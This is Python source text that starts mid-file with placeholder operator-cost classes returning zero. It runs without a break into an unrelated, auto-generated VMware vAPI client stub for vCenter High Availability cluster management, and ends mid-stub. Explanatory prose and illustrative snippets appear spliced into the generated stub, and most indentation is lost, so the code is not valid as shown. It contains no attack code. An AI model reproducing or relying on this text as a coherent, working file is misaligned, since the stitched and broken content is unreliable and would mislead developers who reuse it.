super(SumOpCost, self).__init__(op=op, op_desc=op_desc, cluster=cluster)
    # For a concrete COMP OP, the calc_time and calc_flops functions need to be overridden
def calc_flops(self):
# NOTE: The actual formula will be filled in the future
return 0
def calc_time(self):
# NOTE: The actual formula will be filled in the future
return 0
@register_op_cost
class TopKOpCost(CompOpCost):
OP_TYPE = "top_k"
def __init__(self, op=None, op_desc=None, cluster=None):
super(TopKOpCost, self).__init__(op=op,
op_desc=op_desc,
cluster=cluster)
    # For a concrete COMP OP, the calc_time and calc_flops functions need to be overridden
def calc_flops(self):
# NOTE: The actual formula will be filled in the future
return 0
def calc_time(self):
# NOTE: The actual formula will be filled in the future
return 0
@register_op_cost
class Transpose2OpCost(CompOpCost):
OP_TYPE = "transpose2"
def __init__(self, op=None, op_desc=None, cluster=None):
super(Transpose2OpCost, self).__init__(op=op,
op_desc=op_desc,
cluster=cluster)
    # For a concrete COMP OP, the calc_time and calc_flops functions need to be overridden
def calc_flops(self):
# NOTE: The actual formula will be filled in the future
return 0
def calc_time(self):
# NOTE: The actual formula will be filled in the future
return 0
@register_op_cost
class Transpose2GradOpCost(CompOpCost):
OP_TYPE = "transpose2_grad"
def __init__(self, op=None, op_desc=None, cluster=None):
super(Transpose2GradOpCost, self).__init__(op=op,
op_desc=op_desc,
cluster=cluster)
    # For a concrete COMP OP, the calc_time and calc_flops functions need to be overridden
def calc_flops(self):
# NOTE: The actual formula will be filled in the future
return 0
def calc_time(self):
# NOTE: The actual formula will be filled in the future
return 0
@register_op_cost
class Unsqueeze2OpCost(CompOpCost):
OP_TYPE = "unsqueeze2"
def __init__(self, op=None, op_desc=None, cluster=None):
super(Unsqueeze2OpCost, self).__init__(op=op,
op_desc=op_desc,
cluster=cluster)
    # For a concrete COMP OP, the calc_time and calc_flops functions need to be overridden
def calc_flops(self):
# NOTE: The actual formula will be filled in the future
return 0
def calc_time(self):
# NOTE: The actual formula will be filled in the future
return 0
@register_op_cost
class WriteToArrayOpCost(CompOpCost):
OP_TYPE = "write_to_array"
def __init__(self, op=None, op_desc=None, cluster=None):
super(WriteToArrayOpCost, self).__init__(op=op,
op_desc=op_desc,
cluster=cluster)
    # For a concrete COMP OP, the calc_time and calc_flops functions need to be overridden
def calc_flops(self):
# NOTE: The actual formula will be filled in the future
return 0
def calc_time(self):
# NOTE: The actual formula will be filled in the future
return 0
# -*- coding: utf-8 -*-
#---------------------------------------------------------------------------
# Copyright 2019 VMware, Inc. All rights reserved.
# AUTO GENERATED FILE -- DO NOT MODIFY!
#
# vAPI stub file for package com.vmware.vcenter.vcha.cluster.
#---------------------------------------------------------------------------
"""
The ``com.vmware.vcenter.vcha.cluster_client`` module provides classes for
redeploying and monitoring a vCenter High Availability (VCHA) Cluster after a
successful initial deployment.
"""
__author__ = 'VMware, Inc.'
__docformat__ = 'restructuredtext en'
import sys
from com.vmware.cis_client import Tasks
from vmware.vapi.stdlib.client.task import Task
from vmware.vapi.bindings import type
from vmware.vapi.bindings.converter import TypeConverter
from vmware.vapi.bindings.enum import Enum
from vmware.vapi.bindings.error import VapiError
from vmware.vapi.bindings.struct import VapiStruct
from vmware.vapi.bindings.stub import (
ApiInterfaceStub, StubFactoryBase, VapiInterface)
from vmware.vapi.bindings.common import raise_core_exception
from vmware.vapi.data.validator import (UnionValidator, HasFieldsOfValidator)
from vmware.vapi.exception import CoreException
from vmware.vapi.lib.constants import TaskType
from vmware.vapi.lib.rest import OperationRestMetadata
class Active(VapiInterface):
"""
The ``Active`` class provides methods to get information related to the
active vCenter High Availability (VCHA) node. This class was added in
vSphere API 6.7.1.
"""
_VAPI_SERVICE_ID = 'com.vmware.vcenter.vcha.cluster.active'
"""
Identifier of the service in canonical form.
"""
def __init__(self, config):
"""
:type config: :class:`vmware.vapi.bindings.stub.StubConfiguration`
:param config: Configuration to be used for creating the stub.
"""
VapiInterface.__init__(self, config, _ActiveStub)
class Info(VapiStruct):
"""
The ``Active.Info`` class contains the network and placement information of
the active node of a VCHA Cluster. This class was added in vSphere API
6.7.1.
.. tip::
The arguments are used to initialize data attributes with the same
names.
"""
def __init__(self,
management=None,
ha=None,
placement=None,
):
"""
:type management: :class:`com.vmware.vcenter.vcha_client.IpSpec`
:param management: IP specification for the Management network. This attribute was
added in vSphere API 6.7.1.
:type ha: :class:`com.vmware.vcenter.vcha_client.IpSpec` or ``None``
:param ha: IP specification for the HA network. This attribute was added in
vSphere API 6.7.1.
If None, then the second NIC of the Active Node of the VCHA cluster
is not configured.
:type placement: :class:`com.vmware.vcenter.vcha_client.PlacementInfo` or ``None``
:param placement: Contains the placement information of the active node. This
attribute was added in vSphere API 6.7.1.
If None, the request specified that placement information of the
active node should not be included.
"""
self.management = management
self.ha = ha
self.placement = placement
VapiStruct.__init__(self)
Info._set_binding_type(type.StructType(
'com.vmware.vcenter.vcha.cluster.active.info', {
'management': type.ReferenceType('com.vmware.vcenter.vcha_client', 'IpSpec'),
'ha': type.OptionalType(type.ReferenceType('com.vmware.vcenter.vcha_client', 'IpSpec')),
'placement': type.OptionalType(type.ReferenceType('com.vmware.vcenter.vcha_client', 'PlacementInfo')),
},
Info,
False,
None))
def get(self,
vc_spec=None,
partial=None,
):
"""
Retrieves information about the active node of a VCHA cluster. This
method was added in vSphere API 6.7.1.
:type vc_spec: :class:`com.vmware.vcenter.vcha_client.CredentialsSpec` or ``None``
:param vc_spec: Contains active node's management vCenter server credentials.
If None, then the active vCenter Server instance is assumed to be
either self-managed or else in enhanced linked mode and managed by
a linked vCenter Server instance.
:type partial: :class:`bool` or ``None``
:param partial: If true, then return only the information that does not require
connecting to the Active vCenter Server.
If false or unset, then return all the information.
If None, then return all the information.
:rtype: :class:`Active.Info`
:return: Info structure containing information about the VCHA network and
placement of the active node.
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidArgument`
If the credentials provided for authenticating with the active
node's management vCenter server are invalid.
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
If the user has insufficient privilege to perform the operation.
* If ``partial`` is false or unset, then the operation execution
requires the Global.VCServer privilege.
* If ``partial`` is true, then the operation execution requires the
System.Read privilege.
:raise: :class:`com.vmware.vapi.std.errors_client.UnverifiedPeer`
If the SSL certificate of the management vCenter server cannot be
validated.
The value of the data attribute of
:class:`com.vmware.vapi.std.errors_client.Error` will be a class
that contains all the attributes defined in
:class:`com.vmware.vcenter.vcha_client.CertificateInfo`.
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidElementConfiguration`
If the active node is on more than one datastore.
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
If the active virtual machine is not managed by the specified
vCenter server for the active node.
:raise: :class:`com.vmware.vapi.std.errors_client.Error`
If the management interface IP address assignment is not static.
:raise: :class:`com.vmware.vapi.std.errors_client.Error`
If any other error occurs.
"""
return self._invoke('get',
{
'vc_spec': vc_spec,
'partial': partial,
})
class DeploymentType(VapiInterface):
"""
The DeploymentType class provides methods to get the deployment type of a
vCenter High Availability Cluster (VCHA Cluster). This class was added in
vSphere API 6.7.1.
"""
_VAPI_SERVICE_ID = 'com.vmware.vcenter.vcha.cluster.deployment_type'
"""
Identifier of the service in canonical form.
"""
def __init__(self, config):
"""
:type config: :class:`vmware.vapi.bindings.stub.StubConfiguration`
:param config: Configuration to be used for creating the stub.
"""
VapiInterface.__init__(self, config, _DeploymentTypeStub)
class Type(Enum):
"""
The ``DeploymentType.Type`` class defines the possible deployment types for
a VCHA Cluster. This enumeration was added in vSphere API 6.7.1.
.. note::
This class represents an enumerated type in the interface language
definition. The class contains class attributes which represent the
values in the current version of the enumerated type. Newer versions of
the enumerated type may contain new values. To use new values of the
enumerated type in communication with a server that supports the newer
version of the API, you instantiate this class. See :ref:`enumerated
type description page <enumeration_description>`.
"""
NONE = None
"""
VCHA Cluster is not configured. This class attribute was added in vSphere
API 6.7.1.
"""
AUTO = None
"""
VCHA Cluster was deployed automatically. This class attribute was added in
vSphere API 6.7.1.
"""
MANUAL = None
"""
VCHA Cluster was deployed manually. This class attribute was added in
vSphere API 6.7.1.
"""
def __init__(self, string):
"""
:type string: :class:`str`
:param string: String value for the :class:`Type` instance.
"""
Enum.__init__(string)
Type._set_values([
Type('NONE'),
Type('AUTO'),
Type('MANUAL'),
])
Type._set_binding_type(type.EnumType(
'com.vmware.vcenter.vcha.cluster.deployment_type.type',
Type))
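The note in the ``Type`` docstring says that newer servers may emit enum values this binding version does not know about, and that such values can still be represented by instantiating the class with the new string. The stand-alone sketch below mimics that string-backed enum pattern with a hypothetical `StrEnum`/`DeploymentKind` pair; it is not the real base class from `vmware.vapi.bindings.enum`:

```python
# Minimal mimic of the vAPI string-backed enum pattern (illustrative only;
# the real base class lives in vmware.vapi.bindings.enum).

class StrEnum(str):
    _known = ()

    def __new__(cls, value):
        # Unknown strings are accepted so a client can interoperate with a
        # newer server that emits values this binding version predates.
        return super().__new__(cls, value)

    def is_known(self):
        return str(self) in self._known


class DeploymentKind(StrEnum):
    _known = ("NONE", "AUTO", "MANUAL")


print(DeploymentKind("AUTO").is_known())       # a value known to this binding
print(DeploymentKind("FEDERATED").is_known())  # a hypothetical newer value
```

Because instances are plain strings, comparisons and serialization keep working even for values the binding has never seen.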
class Info(VapiStruct):
"""
The ``DeploymentType.Info`` class contains the deployment type of the VCHA
Cluster. This class was added in vSphere API 6.7.1.
.. tip::
The arguments are used to initialize data attributes with the same
names.
"""
def __init__(self,
deployment_type=None,
):
"""
:type deployment_type: :class:`DeploymentType.Type`
:param deployment_type: Identifies the deployment type of the VCHA cluster. This attribute
was added in vSphere API 6.7.1.
"""
self.deployment_type = deployment_type
VapiStruct.__init__(self)
Info._set_binding_type(type.StructType(
'com.vmware.vcenter.vcha.cluster.deployment_type.info', {
'deployment_type': type.ReferenceType(__name__, 'DeploymentType.Type'),
},
Info,
False,
None))
def get(self):
"""
Retrieves the deployment type of a VCHA cluster. This method was added
in vSphere API 6.7.1.
:rtype: :class:`DeploymentType.Info`
:return: Info structure containing the deployment type information of the
the VCHA cluster.
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
If the user has insufficient privilege to perform the operation.
Operation execution requires the System.Read privilege.
:raise: :class:`com.vmware.vapi.std.errors_client.Error`
If any other error occurs.
"""
return self._invoke('get', None)
class Mode(VapiInterface):
"""
The Mode class provides methods to manage the operating mode of a vCenter
High Availability Cluster (VCHA Cluster). This class was added in vSphere
API 6.7.1.
"""
_VAPI_SERVICE_ID = 'com.vmware.vcenter.vcha.cluster.mode'
"""
Identifier of the service in canonical form.
"""
def __init__(self, config):
"""
:type config: :class:`vmware.vapi.bindings.stub.StubConfiguration`
:param config: Configuration to be used for creating the stub.
"""
VapiInterface.__init__(self, config, _ModeStub)
class ClusterMode(Enum):
"""
The ``Mode.ClusterMode`` class defines the possible modes for a VCHA
Cluster. This enumeration was added in vSphere API 6.7.1.
.. note::
This class represents an enumerated type in the interface language
definition. The class contains class attributes which represent the
values in the current version of the enumerated type. Newer versions of
the enumerated type may contain new values. To use new values of the
enumerated type in communication with a server that supports the newer
version of the API, you instantiate this class. See :ref:`enumerated
type description page <enumeration_description>`.
"""
ENABLED = None
"""
VCHA Cluster is enabled. State replication between the Active and Passive
node is enabled and automatic failover is allowed. This class attribute was
added in vSphere API 6.7.1.
"""
DISABLED = None
"""
VCHA Cluster is disabled. State replication between the Active and Passive
node is disabled and automatic failover is not allowed. This class
attribute was added in vSphere API 6.7.1.
"""
MAINTENANCE = None
"""
VCHA Cluster is in maintenance mode. State replication between the Active
and Passive node is enabled but automatic failover is not allowed. This
class attribute was added in vSphere API 6.7.1.
"""
def __init__(self, string):
"""
:type string: :class:`str`
:param string: String value for the :class:`ClusterMode` instance.
"""
Enum.__init__(string)
ClusterMode._set_values([
ClusterMode('ENABLED'),
ClusterMode('DISABLED'),
ClusterMode('MAINTENANCE'),
])
ClusterMode._set_binding_type(type.EnumType(
'com.vmware.vcenter.vcha.cluster.mode.cluster_mode',
ClusterMode))
class Info(VapiStruct):
"""
The ``Mode.Info`` class contains the mode of the VCHA Cluster. This class
was added in vSphere API 6.7.1.
.. tip::
The arguments are used to initialize data attributes with the same
names.
"""
def __init__(self,
mode=None,
):
"""
:type mode: :class:`Mode.ClusterMode`
:param mode: Identifies the mode of the VCHA cluster. This attribute was added
in vSphere API 6.7.1.
"""
self.mode = mode
VapiStruct.__init__(self)
Info._set_binding_type(type.StructType(
'com.vmware.vcenter.vcha.cluster.mode.info', {
'mode': type.ReferenceType(__name__, 'Mode.ClusterMode'),
},
Info,
False,
None))
def get(self):
"""
Retrieves the current mode of a VCHA cluster. This method was added in
vSphere API 6.7.1.
:rtype: :class:`Mode.Info`
:return: Info structure containing the mode of the VCHA cluster.
:raise: :class:`com.vmware.vapi.std.errors_client.NotAllowedInCurrentState`
If the VCHA cluster is not configured.
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
If the user has insufficient privilege to perform the operation.
Operation execution requires the System.Read privilege.
:raise: :class:`com.vmware.vapi.std.errors_client.Error`
If any other error occurs.
"""
return self._invoke('get', None)
def set_task(self,
mode,
):
"""
Manipulates the mode of a VCHA Cluster. The following mode transitions
are allowed:
enabled -> disabled - Allowed only in healthy and degraded states.
enabled -> maintenance - Allowed only in healthy state.
disabled -> enabled - Allowed only in healthy state.
maintenance -> enabled - Allowed only in healthy state with all nodes
running the same version.
maintenance -> disabled - Allowed only in healthy state with all nodes
running the same version.
All other transitions are not allowed.
The VCHA Cluster configuration remains intact in any of the cluster modes.
This method was added in vSphere API 6.7.1.
:type mode: :class:`Mode.ClusterMode`
:param mode: The cluster mode to which the VCHA cluster should be set.
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
If the user has insufficient privilege to perform the operation.
Operation execution requires the Global.VCServer privilege.
:raise: :class:`com.vmware.vapi.std.errors_client.Error`
If any other error occurs.
"""
task_id = self._invoke('set$task',
{
'mode': mode,
})
task_svc = Tasks(self._config)
task_instance = Task(task_id, task_svc, type.VoidType())
return task_instance
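The transition rules spelled out in the ``set_task`` docstring can be encoded as a lookup table. The sketch below is a client-side mirror of those documented rules only; the server remains the authority, and the extra "all nodes on the same version" requirement for leaving maintenance mode is noted but not modeled:

```python
# Client-side sketch of the documented VCHA mode-transition rules.
# The server enforces these; this table only mirrors the docstring above.

ALLOWED_TRANSITIONS = {
    ("enabled", "disabled"): {"healthy", "degraded"},
    ("enabled", "maintenance"): {"healthy"},
    ("disabled", "enabled"): {"healthy"},
    ("maintenance", "enabled"): {"healthy"},   # also requires uniform node versions
    ("maintenance", "disabled"): {"healthy"},  # also requires uniform node versions
}

def transition_allowed(current, target, health):
    """Return True if the docstring permits current -> target at this health."""
    states = ALLOWED_TRANSITIONS.get((current, target))
    return states is not None and health in states

print(transition_allowed("enabled", "disabled", "degraded"))  # True
print(transition_allowed("disabled", "enabled", "degraded"))  # False
```

A pre-check like this can give faster feedback in tooling, but the authoritative answer still comes from invoking ``set$task`` and inspecting the resulting task.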
class Passive(VapiInterface):
"""
The ``Passive`` class provides methods to validate a passive node's
placement configuration and to redeploy the passive node in a vCenter High
Availability (VCHA) cluster. This class was added in vSphere API 6.7.1.
"""
_VAPI_SERVICE_ID = 'com.vmware.vcenter.vcha.cluster.passive'
"""
Identifier of the service in canonical form.
"""
def __init__(self, config):
"""
:type config: :class:`vmware.vapi.bindings.stub.StubConfiguration`
:param config: Configuration to be used for creating the stub.
"""
VapiInterface.__init__(self, config, _PassiveStub)
class CheckSpec(VapiStruct):
"""
The ``Passive.CheckSpec`` class contains placement information for
validation. This class was added in vSphere API 6.7.1.
.. tip::
The arguments are used to initialize data attributes with the same
names.
"""
def __init__(self,
vc_spec=None,
placement=None,
):
"""
:type vc_spec: :class:`com.vmware.vcenter.vcha_client.CredentialsSpec` or ``None``
:param vc_spec: Contains the active node's management vCenter server credentials.
This attribute was added in vSphere API 6.7.1.
If None, then the active vCenter Server instance is assumed to be
either self-managed or else in enhanced linked mode and managed by
a linked vCenter Server instance.
:type placement: :class:`com.vmware.vcenter.vcha_client.PlacementSpec`
:param placement: Contains the node's placement information for validation. This
attribute was added in vSphere API 6.7.1.
"""
self.vc_spec = vc_spec
self.placement = placement
VapiStruct.__init__(self)
CheckSpec._set_binding_type(type.StructType(
'com.vmware.vcenter.vcha.cluster.passive.check_spec', {
'vc_spec': type.OptionalType(type.ReferenceType('com.vmware.vcenter.vcha_client', 'CredentialsSpec')),
'placement': type.ReferenceType('com.vmware.vcenter.vcha_client', 'PlacementSpec'),
},
CheckSpec,
False,
None))
class CheckResult(VapiStruct):
"""
The ``Passive.CheckResult`` class contains the warnings and errors that
will occur during the clone operation. This class was added in vSphere API
6.7.1.
.. tip::
The arguments are used to initialize data attributes with the same
names.
"""
def __init__(self,
warnings=None,
errors=None,
):
"""
:type warnings: :class:`list` of :class:`com.vmware.vapi.std_client.LocalizableMessage`
:param warnings: A list of problems which may require attention, but which are not
fatal. This attribute was added in vSphere API 6.7.1.
:type errors: :class:`list` of :class:`com.vmware.vapi.std_client.LocalizableMessage`
:param errors: A list of problems which are fatal to the operation and the
operation will fail. This attribute was added in vSphere API 6.7.1.
"""
self.warnings = warnings
self.errors = errors
VapiStruct.__init__(self)
CheckResult._set_binding_type(type.StructType(
'com.vmware.vcenter.vcha.cluster.passive.check_result', {
'warnings': type.ListType(type.ReferenceType('com.vmware.vapi.std_client', 'LocalizableMessage')),
'errors': type.ListType(type.ReferenceType('com.vmware.vapi.std_client', 'LocalizableMessage')),
},
CheckResult,
False,
None))
class RedeploySpec(VapiStruct):
"""
The ``Passive.RedeploySpec`` class contains the redeploy specification.
This class was added in vSphere API 6.7.1.
.. tip::
The arguments are used to initialize data attributes with the same
names.
"""
def __init__(self,
vc_spec=None,
placement=None,
ha_ip=None,
failover_ip=None,
):
"""
:type vc_spec: :class:`com.vmware.vcenter.vcha_client.CredentialsSpec` or ``None``
:param vc_spec: Contains the active node's management vCenter server credentials.
This attribute was added in vSphere API 6.7.1.
If None, then the active vCenter Server instance is assumed to be
either self-managed or else in enhanced linked mode and managed by
a linked vCenter Server instance.
:type placement: :class:`com.vmware.vcenter.vcha_client.PlacementSpec`
:param placement: Contains the node's placement information. This attribute was added
in vSphere API 6.7.1.
:type ha_ip: :class:`com.vmware.vcenter.vcha_client.IpSpec` or ``None``
:param ha_ip: Contains the VCHA HA network configuration of the node. All cluster
communication (state replication, heartbeat, cluster messages)
happens over this network. This attribute was added in vSphere API
6.7.1.
If None, then the stored network configuration for the VCHA HA
network for the passive node will be used.
:type failover_ip: :class:`com.vmware.vcenter.vcha_client.IpSpec` or ``None``
:param failover_ip: Failover IP address that this node must assume after the failover
to serve client requests. This attribute was added in vSphere API
6.7.1.
If None, then the public IP address of the Active vCenter Server is
assumed.
"""
self.vc_spec = vc_spec
self.placement = placement
self.ha_ip = ha_ip
self.failover_ip = failover_ip
VapiStruct.__init__(self)
RedeploySpec._set_binding_type(type.StructType(
'com.vmware.vcenter.vcha.cluster.passive.redeploy_spec', {
'vc_spec': type.OptionalType(type.ReferenceType('com.vmware.vcenter.vcha_client', 'CredentialsSpec')),
'placement': type.ReferenceType('com.vmware.vcenter.vcha_client', 'PlacementSpec'),
'ha_ip': type.OptionalType(type.ReferenceType('com.vmware.vcenter.vcha_client', 'IpSpec')),
'failover_ip': type.OptionalType(type.ReferenceType('com.vmware.vcenter.vcha_client', 'IpSpec')),
},
RedeploySpec,
False,
None))
def check(self,
spec,
):
"""
Validates the specified passive node's placement configuration. This
method was added in vSphere API 6.7.1.
:type spec: :class:`Passive.CheckSpec`
:param spec: Contains the passive node's placement specification.
:rtype: :class:`Passive.CheckResult`
:return: CheckResult structure containing errors and warnings.
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidArgument`
If the credentials provided for authenticating with the active
node's management vCenter server are invalid.
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidArgument`
If the specified resource spec is deemed invalid for the clone
operation.
:raise: :class:`com.vmware.vapi.std.errors_client.UnverifiedPeer`
If the SSL certificate of the management vCenter server cannot be
validated.
The value of the data attribute of
:class:`com.vmware.vapi.std.errors_client.Error` will be a class
that contains all the attributes defined in
:class:`com.vmware.vcenter.vcha_client.CertificateInfo`.
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
If the active virtual machine is not managed by the specified
vCenter server for the active node.
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidElementConfiguration`
If the active node is on more than one datastore.
:raise: :class:`com.vmware.vapi.std.errors_client.NotAllowedInCurrentState`
If the clone operation is not allowed in the current state of the
system.
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
If the user has insufficient privilege to perform the operation.
Operation execution requires the Global.VCServer privilege.
:raise: :class:`com.vmware.vapi.std.errors_client.Error`
If any other error occurs.
"""
return self._invoke('check',
{
'spec': spec,
})
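Per the docstrings above, ``check`` returns a ``CheckResult`` whose ``warnings`` are advisory and whose ``errors`` are fatal to the clone operation. The sketch below shows that triage with plain ``namedtuple`` stand-ins for the SDK types, since constructing the real ``Passive.CheckResult`` and ``LocalizableMessage`` objects requires the SDK; the field names used here are assumptions for illustration:

```python
# Stand-in triage for a Passive.check() result: warnings are advisory,
# any error means the redeploy would fail. Plain namedtuples substitute
# for the SDK's CheckResult and LocalizableMessage types.

from collections import namedtuple

CheckResult = namedtuple("CheckResult", ["warnings", "errors"])
Message = namedtuple("Message", ["id", "default_message"])

def summarize(result):
    """Print warnings and report whether it is safe to proceed."""
    for w in result.warnings:
        print("WARNING:", w.default_message)
    for e in result.errors:
        print("ERROR:", e.default_message)
    # Proceed only when the check produced zero fatal errors.
    return not result.errors

ok = summarize(CheckResult(
    warnings=[Message("vcha.sample", "sample advisory message")],
    errors=[],
))
print(ok)  # True
```

The same pattern applies to ``Witness.check`` below, which returns an identically shaped result.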
def redeploy_task(self,
spec,
):
"""
Creates the passive node in a degraded cluster with node location
information and pre-existing VCHA cluster configuration from the active
node. This method was added in vSphere API 6.7.1.
:type spec: :class:`Passive.RedeploySpec`
:param spec: Contains the passive node's redeploy specification.
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidArgument`
If the credentials provided for authenticating with the active
node's management vCenter server are invalid.
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
If the user has insufficient privilege to perform the operation.
Operation execution requires the Global.VCServer privilege.
:raise: :class:`com.vmware.vapi.std.errors_client.UnverifiedPeer`
If the SSL certificate of the management vCenter server cannot be
validated.
The value of the data attribute of
:class:`com.vmware.vapi.std.errors_client.Error` will be a class
that contains all the attributes defined in
:class:`com.vmware.vcenter.vcha_client.CertificateInfo`.
:raise: :class:`com.vmware.vapi.std.errors_client.Error`
If any other error occurs.
"""
task_id = self._invoke('redeploy$task',
{
'spec': spec,
})
task_svc = Tasks(self._config)
task_instance = Task(task_id, task_svc, type.VoidType())
return task_instance
class Witness(VapiInterface):
"""
The ``Witness`` class provides methods to validate a witness's placement
configuration and redeploy the witness node in a vCenter High Availability
(VCHA) cluster. This class was added in vSphere API 6.7.1.
"""
_VAPI_SERVICE_ID = 'com.vmware.vcenter.vcha.cluster.witness'
"""
Identifier of the service in canonical form.
"""
def __init__(self, config):
"""
:type config: :class:`vmware.vapi.bindings.stub.StubConfiguration`
:param config: Configuration to be used for creating the stub.
"""
VapiInterface.__init__(self, config, _WitnessStub)
class CheckSpec(VapiStruct):
"""
The ``Witness.CheckSpec`` class contains placement information for
validation. This class was added in vSphere API 6.7.1.
.. tip::
The arguments are used to initialize data attributes with the same
names.
"""
def __init__(self,
vc_spec=None,
placement=None,
):
"""
:type vc_spec: :class:`com.vmware.vcenter.vcha_client.CredentialsSpec` or ``None``
:param vc_spec: Contains the active node's management vCenter server credentials.
This attribute was added in vSphere API 6.7.1.
If None, then the active vCenter Server instance is assumed to be
either self-managed or else in enhanced linked mode and managed by
a linked vCenter Server instance.
:type placement: :class:`com.vmware.vcenter.vcha_client.PlacementSpec`
:param placement: Contains the node's placement information for validation. This
attribute was added in vSphere API 6.7.1.
"""
self.vc_spec = vc_spec
self.placement = placement
VapiStruct.__init__(self)
CheckSpec._set_binding_type(type.StructType(
'com.vmware.vcenter.vcha.cluster.witness.check_spec', {
'vc_spec': type.OptionalType(type.ReferenceType('com.vmware.vcenter.vcha_client', 'CredentialsSpec')),
'placement': type.ReferenceType('com.vmware.vcenter.vcha_client', 'PlacementSpec'),
},
CheckSpec,
False,
None))
class CheckResult(VapiStruct):
"""
The ``Witness.CheckResult`` class contains the warnings and errors that
will occur during the clone operation. This class was added in vSphere API
6.7.1.
.. tip::
The arguments are used to initialize data attributes with the same
names.
"""
def __init__(self,
warnings=None,
errors=None,
):
"""
:type warnings: :class:`list` of :class:`com.vmware.vapi.std_client.LocalizableMessage`
:param warnings: A list of problems which may require attention, but which are not
fatal. This attribute was added in vSphere API 6.7.1.
:type errors: :class:`list` of :class:`com.vmware.vapi.std_client.LocalizableMessage`
:param errors: A list of problems which are fatal to the operation and the
operation will fail. This attribute was added in vSphere API 6.7.1.
"""
self.warnings = warnings
self.errors = errors
VapiStruct.__init__(self)
CheckResult._set_binding_type(type.StructType(
'com.vmware.vcenter.vcha.cluster.witness.check_result', {
'warnings': type.ListType(type.ReferenceType('com.vmware.vapi.std_client', 'LocalizableMessage')),
'errors': type.ListType(type.ReferenceType('com.vmware.vapi.std_client', 'LocalizableMessage')),
},
CheckResult,
False,
None))
class RedeploySpec(VapiStruct):
"""
The ``Witness.RedeploySpec`` class contains the redeploy specification.
This class was added in vSphere API 6.7.1.
.. tip::
The arguments are used to initialize data attributes with the same
names.
"""
def __init__(self,
vc_spec=None,
placement=None,
ha_ip=None,
):
"""
:type vc_spec: :class:`com.vmware.vcenter.vcha_client.CredentialsSpec` or ``None``
:param vc_spec: Contains the active node's management vCenter server credentials.
This attribute was added in vSphere API 6.7.1.
If None, then the active vCenter Server instance is assumed to be
either self-managed or else in enhanced linked mode and managed by
a linked vCenter Server instance.
:type placement: :class:`com.vmware.vcenter.vcha_client.PlacementSpec`
:param placement: Contains the node's placement information. This attribute was added
in vSphere API 6.7.1.
:type ha_ip: :class:`com.vmware.vcenter.vcha_client.IpSpec` or ``None``
:param ha_ip: Contains the VCHA HA network configuration of the node. All cluster
communication (state replication, heartbeat, cluster messages)
happens over this network. This attribute was added in vSphere API
6.7.1.
If None, then the stored network configuration for the VCHA HA
network for the witness node will be used.
"""
self.vc_spec = vc_spec
self.placement = placement
self.ha_ip = ha_ip
VapiStruct.__init__(self)
RedeploySpec._set_binding_type(type.StructType(
'com.vmware.vcenter.vcha.cluster.witness.redeploy_spec', {
'vc_spec': type.OptionalType(type.ReferenceType('com.vmware.vcenter.vcha_client', 'CredentialsSpec')),
'placement': type.ReferenceType('com.vmware.vcenter.vcha_client', 'PlacementSpec'),
'ha_ip': type.OptionalType(type.ReferenceType('com.vmware.vcenter.vcha_client', 'IpSpec')),
},
RedeploySpec,
False,
None))
def check(self,
spec,
):
"""
Validates the specified witness node's placement configuration. This
method was added in vSphere API 6.7.1.
:type spec: :class:`Witness.CheckSpec`
:param spec: Contains the witness node's placement specification.
:rtype: :class:`Witness.CheckResult`
:return: CheckResult structure containing errors and warnings.
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidArgument`
If the credentials provided for authenticating with the active
node's management vCenter server are invalid.
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidArgument`
If the specified resource spec is deemed invalid for the clone
operation.
:raise: :class:`com.vmware.vapi.std.errors_client.UnverifiedPeer`
If the SSL certificate of the management vCenter server cannot be
validated.
The value of the data attribute of
:class:`com.vmware.vapi.std.errors_client.Error` will be a class
that contains all the attributes defined in
:class:`com.vmware.vcenter.vcha_client.CertificateInfo`.
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
If the active virtual machine is not managed by the specified
vCenter server for the active node.
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidElementConfiguration`
If the active node is on more than one datastore.
:raise: :class:`com.vmware.vapi.std.errors_client.NotAllowedInCurrentState`
If the clone operation is not allowed in the current state of the
system.
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
If the user has insufficient privilege to perform the operation.
Operation execution requires the Global.VCServer privilege.
:raise: :class:`com.vmware.vapi.std.errors_client.Error`
If any other error occurs.
"""
return self._invoke('check',
{
'spec': spec,
})
def redeploy_task(self,
spec,
):
"""
Creates the witness node in a degraded cluster with node location
information and pre-existing VCHA cluster configuration from the active
node. This method was added in vSphere API 6.7.1.
:type spec: :class:`Witness.RedeploySpec`
:param spec: Contains the witness node's redeploy specification.
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidArgument`
If the credentials provided for authenticating with the active
node's management vCenter server are invalid.
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
If the user has insufficient privilege to perform the operation.
Operation execution requires the Global.VCServer privilege.
:raise: :class:`com.vmware.vapi.std.errors_client.UnverifiedPeer`
If the SSL certificate of the management vCenter server cannot be
validated.
The value of the data attribute of
:class:`com.vmware.vapi.std.errors_client.Error` will be a class
that contains all the attributes defined in
:class:`com.vmware.vcenter.vcha_client.CertificateInfo`.
:raise: :class:`com.vmware.vapi.std.errors_client.Error`
If any other error occurs.
"""
task_id = self._invoke('redeploy$task',
{
'spec': spec,
})
task_svc = Tasks(self._config)
task_instance = Task(task_id, task_svc, type.VoidType())
return task_instance
class _ActiveStub(ApiInterfaceStub):
def __init__(self, config):
# properties for get operation
get_input_type = type.StructType('operation-input', {
'vc_spec': type.OptionalType(type.ReferenceType('com.vmware.vcenter.vcha_client', 'CredentialsSpec')),
'partial': type.OptionalType(type.BooleanType()),
})
get_error_dict = {
'com.vmware.vapi.std.errors.invalid_argument':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidArgument'),
